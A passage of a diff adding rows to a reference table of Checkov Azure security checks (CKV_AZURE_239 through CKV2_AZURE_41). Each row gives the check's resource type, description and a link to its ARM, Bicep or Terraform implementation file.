+| 2226 | CKV_AZURE_239            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure Azure Synapse Workspace administrator login password is not exposed                                                                                                                               | arm                     | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py)                                         |
+| 2227 | CKV_AZURE_239            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure Azure Synapse Workspace administrator login password is not exposed                                                                                                                               | Bicep                   | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py)                                         |
+| 2228 | CKV_AZURE_239            | resource                         | azurerm_synapse_workspace                                                                        | Ensure Azure Synapse Workspace administrator login password is not exposed                                                                                                                               | Terraform               | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py)                             |
+| 2229 | CKV_AZURE_240            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure Azure Synapse Workspace is encrypted with a CMK                                                                                                                                                   | arm                     | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py)                                                                               |
+| 2230 | CKV_AZURE_240            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure Azure Synapse Workspace is encrypted with a CMK                                                                                                                                                   | Bicep                   | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py)                                                                               |
+| 2231 | CKV_AZURE_240            | resource                         | azurerm_synapse_workspace                                                                        | Ensure Azure Synapse Workspace is encrypted with a CMK                                                                                                                                                   | Terraform               | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py)                                                                   |
+| 2232 | CKV_AZURE_241            | resource                         | azurerm_synapse_sql_pool                                                                         | Ensure Synapse SQL pools are encrypted                                                                                                                                                                   | Terraform               | [SynapseSQLPoolDataEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py)                                                                     |
+| 2233 | CKV_AZURE_242            | resource                         | Microsoft.Synapse/workspaces/bigDataPools                                                        | Ensure isolated compute is enabled for Synapse Spark pools                                                                                                                                               | arm                     | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py)                                                                 |
+| 2234 | CKV_AZURE_242            | resource                         | Microsoft.Synapse/workspaces/bigDataPools                                                        | Ensure isolated compute is enabled for Synapse Spark pools                                                                                                                                               | Bicep                   | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py)                                                                 |
+| 2235 | CKV_AZURE_242            | resource                         | azurerm_synapse_spark_pool                                                                       | Ensure isolated compute is enabled for Synapse Spark pools                                                                                                                                               | Terraform               | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py)                                                     |
+| 2236 | CKV_AZURE_243            | resource                         | Microsoft.MachineLearningServices/workspaces                                                     | Ensure Azure Machine learning workspace is configured with private endpoint                                                                                                                              | arm                     | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py)                                                                           |
+| 2237 | CKV_AZURE_243            | resource                         | Microsoft.MachineLearningServices/workspaces                                                     | Ensure Azure Machine learning workspace is configured with private endpoint                                                                                                                              | Bicep                   | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py)                                                                           |
+| 2238 | CKV2_AZURE_1             | resource                         | azurerm_storage_account                                                                          | Ensure storage for critical data are encrypted with Customer Managed Key                                                                                                                                 | Terraform               | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml)                                                       |
+| 2239 | CKV2_AZURE_2             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform               | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                               |
+| 2240 | CKV2_AZURE_2             | resource                         | azurerm_sql_server                                                                               | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform               | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                               |
+| 2241 | CKV2_AZURE_3             | resource                         | azurerm_mssql_server                                                                             | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 2242 | CKV2_AZURE_3             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 2243 | CKV2_AZURE_3             | resource                         | azurerm_mssql_server_vulnerability_assessment                                                    | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 2244 | CKV2_AZURE_3             | resource                         | azurerm_sql_server                                                                               | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform               | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 2245 | CKV2_AZURE_4             | resource                         | azurerm_mssql_server                                                                             | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 2246 | CKV2_AZURE_4             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 2247 | CKV2_AZURE_4             | resource                         | azurerm_mssql_server_vulnerability_assessment                                                    | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 2248 | CKV2_AZURE_4             | resource                         | azurerm_sql_server                                                                               | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform               | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 2249 | CKV2_AZURE_5             | resource                         | azurerm_mssql_server                                                                             | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 2250 | CKV2_AZURE_5             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 2251 | CKV2_AZURE_5             | resource                         | azurerm_mssql_server_vulnerability_assessment                                                    | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 2252 | CKV2_AZURE_5             | resource                         | azurerm_sql_server                                                                               | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform               | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 2253 | CKV2_AZURE_6             | resource                         | azurerm_sql_firewall_rule                                                                        | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform               | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                           |
+| 2254 | CKV2_AZURE_6             | resource                         | azurerm_sql_server                                                                               | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform               | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                           |
+| 2255 | CKV2_AZURE_7             | resource                         | azurerm_sql_server                                                                               | Ensure that Azure Active Directory Admin is configured                                                                                                                                                   | Terraform               | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml)                                           |
+| 2256 | CKV2_AZURE_8             | resource                         | azurerm_monitor_activity_log_alert                                                               | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform               | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                           |
+| 2257 | CKV2_AZURE_8             | resource                         | azurerm_storage_account                                                                          | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform               | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                           |
+| 2258 | CKV2_AZURE_8             | resource                         | azurerm_storage_container                                                                        | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform               | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                           |
+| 2259 | CKV2_AZURE_9             | resource                         | azurerm_virtual_machine                                                                          | Ensure Virtual Machines are utilizing Managed Disks                                                                                                                                                      | Terraform               | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml)                                             |
+| 2260 | CKV2_AZURE_10            | resource                         | azurerm_virtual_machine                                                                          | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform               | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)                   |
+| 2261 | CKV2_AZURE_10            | resource                         | azurerm_virtual_machine_extension                                                                | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform               | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)                   |
+| 2262 | CKV2_AZURE_11            | resource                         | azurerm_kusto_cluster                                                                            | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key                                                                                                                           | Terraform               | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml)                                               |
+| 2263 | CKV2_AZURE_12            | resource                         | azurerm_virtual_machine                                                                          | Ensure that virtual machines are backed up using Azure Backup                                                                                                                                            | Terraform               | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml)                                                                                 |
+| 2264 | CKV2_AZURE_13            | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform               | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                         |
+| 2265 | CKV2_AZURE_13            | resource                         | azurerm_sql_server                                                                               | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform               | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                         |
+| 2266 | CKV2_AZURE_14            | resource                         | azurerm_managed_disk                                                                             | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform               | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                                     |
+| 2267 | CKV2_AZURE_14            | resource                         | azurerm_virtual_machine                                                                          | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform               | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                                     |
+| 2268 | CKV2_AZURE_15            | resource                         | azurerm_data_factory                                                                             | Ensure that Azure data factories are encrypted with a customer-managed key                                                                                                                               | Terraform               | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml)                   |
+| 2269 | CKV2_AZURE_16            | resource                         | azurerm_mysql_server                                                                             | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform               | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                           |
+| 2270 | CKV2_AZURE_16            | resource                         | azurerm_mysql_server_key                                                                         | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform               | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                           |
+| 2271 | CKV2_AZURE_17            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform               | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                         |
+| 2272 | CKV2_AZURE_17            | resource                         | azurerm_postgresql_server_key                                                                    | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform               | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                         |
+| 2273 | CKV2_AZURE_19            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                                                                                                                  | arm                     | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py)                                   |
+| 2274 | CKV2_AZURE_19            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                                                                                                                  | Bicep                   | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py)                                   |
+| 2275 | CKV2_AZURE_19            | resource                         | azurerm_synapse_workspace                                                                        | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                                                                                                                  | Terraform               | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml)               |
+| 2276 | CKV2_AZURE_20            | resource                         | azurerm_log_analytics_storage_insights                                                           | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform               | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                         |
+| 2277 | CKV2_AZURE_20            | resource                         | azurerm_storage_account                                                                          | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform               | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                         |
+| 2278 | CKV2_AZURE_20            | resource                         | azurerm_storage_table                                                                            | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform               | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                         |
+| 2279 | CKV2_AZURE_21            | resource                         | azurerm_log_analytics_storage_insights                                                           | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform               | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                           |
+| 2280 | CKV2_AZURE_21            | resource                         | azurerm_storage_account                                                                          | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform               | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                           |
+| 2281 | CKV2_AZURE_21            | resource                         | azurerm_storage_container                                                                        | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform               | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                           |
+| 2282 | CKV2_AZURE_22            | resource                         | azurerm_cognitive_account                                                                        | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform               | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                               |
+| 2283 | CKV2_AZURE_22            | resource                         | azurerm_cognitive_account_customer_managed_key                                                   | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform               | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                               |
+| 2284 | CKV2_AZURE_23            | resource                         | Microsoft.AppPlatform/Spring                                                                     | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                                                                                                                      | arm                     | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml)                                                                     |
+| 2285 | CKV2_AZURE_23            | resource                         | azurerm_spring_cloud_service                                                                     | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                                                                                                                      | Terraform               | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml)                                                         |
+| 2286 | CKV2_AZURE_24            | resource                         | azurerm_automation_account                                                                       | Ensure Azure automation account does NOT have overly permissive network access                                                                                                                           | Terraform               | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml)                         |
+| 2287 | CKV2_AZURE_25            | resource                         | azurerm_mssql_database                                                                           | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled                                                                                                                                   | Terraform               | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml)                                   |
+| 2288 | CKV2_AZURE_26            | resource                         | azurerm_postgresql_flexible_server_firewall_rule                                                 | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access                                                                                                          | Terraform               | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml)                             |
+| 2289 | CKV2_AZURE_27            | resource                         | Microsoft.Sql/servers                                                                            | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | arm                     | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                                                                   |
+| 2290 | CKV2_AZURE_27            | resource                         | Microsoft.Sql/servers                                                                            | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | Bicep                   | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                                                                   |
+| 2291 | CKV2_AZURE_27            | resource                         | azurerm_mssql_server                                                                             | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | Terraform               | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml)                                                                         |
+| 2292 | CKV2_AZURE_28            | resource                         | azurerm_container_group                                                                          | Ensure Container Instance is configured with managed identity                                                                                                                                            | Terraform               | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml)                               |
+| 2293 | CKV2_AZURE_29            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster has Azure CNI networking enabled                                                                                                                                                      | Terraform               | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml)                                                         |
+| 2294 | CKV2_AZURE_30            | resource                         | azurerm_container_registry_webhook                                                               | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook                                                                                                                                      | Terraform               | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml)                                                                           |
+| 2295 | CKV2_AZURE_31            | resource                         | azurerm_subnet                                                                                   | Ensure VNET subnet is configured with a Network Security Group (NSG)                                                                                                                                     | Terraform               | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml)                                                                     |
+| 2296 | CKV2_AZURE_32            | resource                         | azurerm_key_vault                                                                                | Ensure private endpoint is configured to key vault                                                                                                                                                       | Terraform               | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml)                                                 |
+| 2297 | CKV2_AZURE_33            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is configured with private endpoint                                                                                                                                               | Terraform               | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml)                                     |
+| 2298 | CKV2_AZURE_34            | resource                         | azurerm_sql_firewall_rule                                                                        | Ensure Azure SQL server firewall is not overly permissive                                                                                                                                                | Terraform               | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml)                                                   |
+| 2299 | CKV2_AZURE_35            | resource                         | azurerm_recovery_services_vault                                                                  | Ensure Azure recovery services vault is configured with managed identity                                                                                                                                 | Terraform               | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml)                       |
+| 2300 | CKV2_AZURE_36            | resource                         | azurerm_automation_account                                                                       | Ensure Azure automation account is configured with managed identity                                                                                                                                      | Terraform               | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml)                                       |
+| 2301 | CKV2_AZURE_37            | resource                         | azurerm_mariadb_server                                                                           | Ensure Azure MariaDB server is using latest TLS (1.2)                                                                                                                                                    | Terraform               | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml)                                                         |
+| 2302 | CKV2_AZURE_38            | resource                         | azurerm_storage_account                                                                          | Ensure soft-delete is enabled on Azure storage account                                                                                                                                                   | Terraform               | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml)                                               |
+| 2303 | CKV2_AZURE_39            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 2304 | CKV2_AZURE_39            | resource                         | azurerm_network_interface                                                                        | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 2305 | CKV2_AZURE_39            | resource                         | azurerm_virtual_machine                                                                          | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 2306 | CKV2_AZURE_39            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform               | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 2307 | CKV2_AZURE_40            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is not configured with Shared Key authorization                                                                                                                                   | Terraform               | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml)                                                 |
+| 2308 | CKV2_AZURE_41            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is configured with SAS expiration policy                                                                                                                                          | Terraform               | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml)                                         |
